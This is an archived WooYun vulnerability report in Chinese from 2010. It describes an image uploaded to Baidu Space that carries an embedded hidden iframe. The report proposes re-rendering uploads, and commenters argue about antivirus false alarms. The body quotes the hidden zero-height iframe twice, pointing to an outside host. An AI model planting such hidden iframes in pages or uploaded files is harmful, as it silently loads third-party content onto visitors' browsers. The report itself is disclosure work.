当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0716

漏洞标题:百度空间上传图片中包含恶意代码

相关厂商:百度

漏洞作者: 路人甲

提交时间:2010-10-20 12:01

修复时间:2010-11-19 15:00

公开时间:2010-11-19 15:00

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-10-20: 细节已通知厂商并且等待厂商处理中
2010-10-20: 厂商已经确认,细节仅向厂商公开
2010-10-30: 细节向核心白帽子及相关领域专家公开
2010-11-09: 细节向普通白帽子公开
2010-11-19: 细节向实习白帽子公开
2010-11-19: 细节向公众公开

简要描述:

百度空间某相册中,上传的图片中,图片被加入恶意代码,某些浏览器解析图片时候,可能会把恶意代码解析,对客户端产生威胁。

详细说明:

图片位置:http://hiphotos.baidu.com/ruyanshihe/pic/item/a0119cecc26a407179f0555c.jpg
被加入代码:
<iframe src="http://w.mh8888.cn/ad.htm?a" width="100" height="0"></iframe>
chrome浏览时,在图片正常解析的情况下,代码虽然未被执行,但杀毒软件报告了。IE6下估计会被解析。未测试。当浏览者是小白的时候,这种提示,会让小白害怕,对百度的“名声”产生影响。

漏洞证明:

<iframe src="http://w.mh8888.cn/ad.htm?a" width="100" height="0"></iframe>


修复方案:

前段时间,80sec爆了nginx webserver下php.ini参数不当,导致nginx解析漏洞。但这件归根结底是隐患出现在哪里?php参数配置不当?我觉得不是。我觉得问题的主要原因是上传的“图片”不合格,假如包含恶意代码的文件根本不会被保存到服务器上,那么这种问题就不会发生。个人认为,对上传的文件(图片)严格控制,最好用GD重绘图片,使得伪装成正常图片,且包含恶意代码的文件,不包含恶意代码,成为正常的图片。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2010-10-20 15:09

厂商回复:

感谢提交

最新状态:

暂无


漏洞评价:

评论

  1. 2011-09-22 12:40 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    说实话这也反应出杀毒软件的问题,他们只粗解HTTP包,匹到IFRAME的静态规则就暴毒,没有考虑过看看文件头是不是真的图片不会被浏览器解析成HTML,当然这样涉及到杀毒软件的效率问题,误报和效率两者都要考虑。

  2. 2011-09-22 12:46 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    是杀毒软件2b吧 向360看齐!

  3. 2011-09-22 12:50 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    - - , 打上逗号吧,看得我惊心动魄~

  4. 2011-11-14 11:27 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    avast 的问题?svast的误报率的确很高。

  5. 2012-01-24 09:37 | knife ( 普通白帽子 | Rank:155 漏洞数:24 | 抬枪上御女,提臀迎众基。)

    向360看齐

  6. 2012-06-05 09:58 | 寒剑 ( 路人 | Rank:19 漏洞数:5 | 一片空白,白的可怕)

    应该是在图片里插入了一句话木马后上传的

  7. 2012-11-18 17:15 | zhq445078388 ( 实习白帽子 | Rank:60 漏洞数:19 | 请牢记"杀进程点康姆")

    存在风险么? 这个纯粹是流量扫描的弊端而已..,不然 难道你让他回去扫下文件头? 卡死你.